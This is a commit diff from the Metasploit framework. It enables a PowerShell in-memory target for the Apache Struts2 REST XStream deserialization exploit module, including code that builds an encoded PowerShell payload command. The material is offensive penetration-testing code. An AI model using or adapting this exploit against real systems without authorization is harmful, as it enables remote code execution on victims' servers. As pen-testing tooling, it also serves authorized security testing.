Land #10538, PSH target for struts2_rest_xstream

2018-08-27 20:40:50 -05:00 · 2018-08-27 20:40:50 -05:00 · 6d5960a536
parent 9da01723d8 7d21c2094e
commit 6d5960a536
1 changed files with 9 additions and 5 deletions
--- a/modules/exploits/multi/http/struts2_rest_xstream.rb
+++ b/modules/exploits/multi/http/struts2_rest_xstream.rb
@ -43,12 +43,10 @@ class MetasploitModule < Msf::Exploit::Remote
          'Platform'   => 'python',
          'Arch'       => ARCH_PYTHON
        ],
-=begin this stuff that doesn't work yet
        ['PowerShell (In-Memory)',
          'Platform'   => 'win',
          'Arch'       => [ARCH_X86, ARCH_X64]
        ],
-=end
        ['Linux (Dropper)',
          'Platform'   => 'linux',
          'Arch'       => [ARCH_X86, ARCH_X64]
@ -95,8 +93,12 @@ class MetasploitModule < Msf::Exploit::Remote
    when /Python/
      %W{python -c #{cmd}}
    when /PowerShell/
-      # This doesn't work yet
-      %W{cmd.exe /c #{cmd_psh_payload(cmd, payload.arch, remove_comspec: true)}}
+      payload ? cmd_psh_payload(
+        cmd,
+        payload.arch,
+        remove_comspec:       true,
+        encode_final_payload: true
+      ).split : %W{powershell.exe -c #{cmd}}
    when /Windows/
      %W{cmd.exe /c #{cmd}}
    end
@ -111,7 +113,9 @@ class MetasploitModule < Msf::Exploit::Remote
      'data'   => xstream_payload(cmd)
    )

-    check_response(res) || fail_with(Failure::UnexpectedReply, res.inspect)
+    return false unless check_response(res)
+
+    true
  end

  # java -cp target/marshalsec-0.0.1-SNAPSHOT-all.jar marshalsec.XStream ImageIO